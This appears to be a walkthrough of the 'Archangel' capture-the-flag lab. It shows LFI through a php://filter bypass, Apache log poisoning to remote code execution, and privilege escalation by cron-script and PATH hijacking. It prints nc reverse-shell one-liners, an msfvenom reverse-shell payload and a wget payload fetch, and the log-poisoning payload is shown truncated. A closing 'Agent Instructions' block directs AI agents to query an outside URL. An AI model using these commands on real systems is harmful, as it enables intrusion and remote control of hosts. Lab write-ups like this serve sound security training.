# Archangel ![](/files/-MbrX80KTbrXtv_a2yzp) ## Reconnaissance Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (**-Pn**) ``` nmap -Pn 10.10.104.47 ``` ![](/files/-MbsAAFMexH1EeUPukA2) Detailed Nmap Scan : Command Breakdown: * (**-sV):** Service version * (**-sC**): Default nmap scripts * (**-p):** Specifying ports 22,80 * (**-oN nmap**): Saving it into a file called nmap ``` nmap -sV -sC -p 22,80 -oN nmap 10.10.104.47 ``` ![](/files/-MbsADs8OwUgA7E2NjJ9) ## Enumeration Lets visit the webpage ![](/files/-MbsB1sNl6_zwscPQUWh) Looking at the page, we see a domain , lets add this to our `/etc/hosts` file ![](/files/-MbsBGiPfbKhTUqKWcKw) Now lets go to the webpage. ![](/files/-MbsBNMS99hQOR-DGc5i) We have the first flag ![](/files/-MbsBRbP15yH3N_OK_Qn) Lets look for a `robots.txt` file as we usually find pages that are important. ![](/files/-MbsBeBIonPl-zOkBQZJ) And we found one, lets visit this ![](/files/-MbsBkPo2kgmPIbxiqTX) The page has a button, lets press it ![](/files/-MbsBrloQspSUp8ZGOQc) It takes us to a different page. Looking at the URL , the view parameter is navigating through the directories, lets try to use some LFI commands to find vulnerabilities. I was searching on google when I found this. ![](/files/-MbsCNHGTMx-7AjiDSAO) ## Exploitation They say that we can use this command to bypass the filter and get a LFI vulnerability, lets test it out. ``` http://xqi.cc/index.php?m=php://filter/convert.base64-encode/resource=index ``` Lets change this command to our page and php file. ``` http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/mrrobot.php ``` When we replace the current URL with this one, we get this ![](/files/-MbsCwngPr2mBF5mRdx0) Its a `base64` encoded string. When we decode it, we get the message earlier. ![](/files/-MbsDGZkPkhTqzx5Rr_b) Now lets try to read other pages like `test.php`. ![](/files/-MbsDdjJfcejjFqUnx60) We get another base64 encoded string, lets decode it. ![](/files/-MbsDpBMEzvcrojp6ILb) We have the second flag. ![](/files/-MbsDygrjZNnRhwU3o-O) Lets now look at the code closely ![](/files/-MbsEhT5ezmcaKuvcy7f) In line 17 we can see the conditions. The first one is that the parameter should not contain the substring `../../` and the second one is that the parameter must contain the string `/var/www/html/development_testing`. So for the first conditions we can use `../../../` . We know that this is running on Apache web server so there should be a access.log file, lets check if we can access it. ``` http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././../log/apache2/access.log ``` ![](/files/-MbsOQspbYXjQIpA4_yf) Now we can try log poisoning to get Remote Code Execution (RCE): We have to send this reverse shell in the request. ``` &1|nc 10.13.8.64 1234 >/tmp/f');?> ``` Make sure to set up a netcat listener ![](/files/-MbsRYuSZhf5j4wNTtHC) First we have to intercept the request and pass this code in the user-agent parameter ![](/files/-MbsRtSOfM7CZhy5z-kd) And now if we send the request we get a reverse shell. ![](/files/-MbsS-ZtkWgicnpVdGId) Now lets stabilize the shell ![](/files/-MbsSH7wesPGkdMCxN-f) We can read the user.txt file ![](/files/-MbsW0RXffyKMycOjfQW) ## Privilege Escalation In the `home/myfiles` directory of archangel you see a `passwordbackup` file, you can go check it out. ![](/files/-MbsWFSqUSy8sPy4UAfU) ``` https://www.youtube.com/watch?v=dQw4w9WgXcQ ``` We have another directory which might be interesting called secret, lets try to change directories into it. ![](/files/-MbsWpVfHJlQWCfGkTvm) And we are not allowed. We need to be the user archangel to access this. Lets look at other files that are owned by archangel. ``` find / -user archangel -type f 2>/dev/null ``` ![](/files/-MbsXfsJV4PjYXFNUTwO) We find these, the first one looks interesting, so lets check it out. ![](/files/-MbsXvTcP1G7-YfnfguS) Its a bash script, lets look at the permissions to see if we can write to it. ![](/files/-MbsYfuACcEtLXMEHSKQ) Looks like we can so lets echo a reverse shell into the file and execute to get a reverse shell. ``` rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 1234 >/tmp/f ``` Also make sure to start a netcat reverse shell listener ![](/files/-MbsYvTngCdbJId_BM2G) Now lets echo the reverse shell into the file and execute the file ![](/files/-MbsZHPfnovw_EfjE4eb) ![](/files/-MbsZQ0bzcL6cRF2o7f2) We are archangel now. Lets stabilize the shell ![](/files/-MbsZdmYyKwNKguNKy3O) Lets go into the secret directory ![](/files/-MbsZo0wxeV04wKUIdM2) We can read the `user2.txt` file, lets read the other file called `backup`. ![](/files/-Mbs_3d0F4gUtQP7mHnx) Looks like we can't the output we can read, lets see what type of file it is. ![](/files/-Mbs_FfWN4WEyzGWQZNh) Its a `LSD shared object`. Lets use the strings command to get more information ![](/files/-Mbsa19ClktTAwkKl8U4) This command is interesting, the `cp` command is run without the full path , which means that this is exploitable, lets create `msfvenom` payload called cp and adjust the `PATH` variable and when executed we should get a reverse shell. ``` msfvenom -p linux/x64/shell_reverse_tcp -f elf -o cp LHOST=10.13.8.64 LPORT=1234 ``` ![](/files/-MbsagiN-qsz2AtYkNC3) Now we have to transfer the file so lets start a http server. ``` python3 -m http.server 8000 ``` ![](/files/-MbsayyLO0uZUP8HPTKd) Now use this command on the victim machine to download the file, make sure you are in the secret directory. ``` wget http://10.13.8.64/cp ``` ![](/files/-MbwM-2zH4y5SubdOXKn) Now lets modify the `PATH` variable. ``` echo $PATH export PATH=/home/archangel/secret:$PATH echo $PATH ``` ![](/files/-MbwLgqOEOScuwH9CzFA) Now start a netcat listener and make the cp file executable ![](/files/-MbwMDYRGwrwWnTxw8UO) ![](/files/-MbwMJSXiOu1vBKi8pvc) Now run the backup file ![](/files/-MbwMTnjmbq54ylpKyQJ) And you should get a reverse shell as root ![](/files/-MbwMYUpnc2p75iImsMt) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://writeups.adityadindi.com/tryhackme/untitled/archangel.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.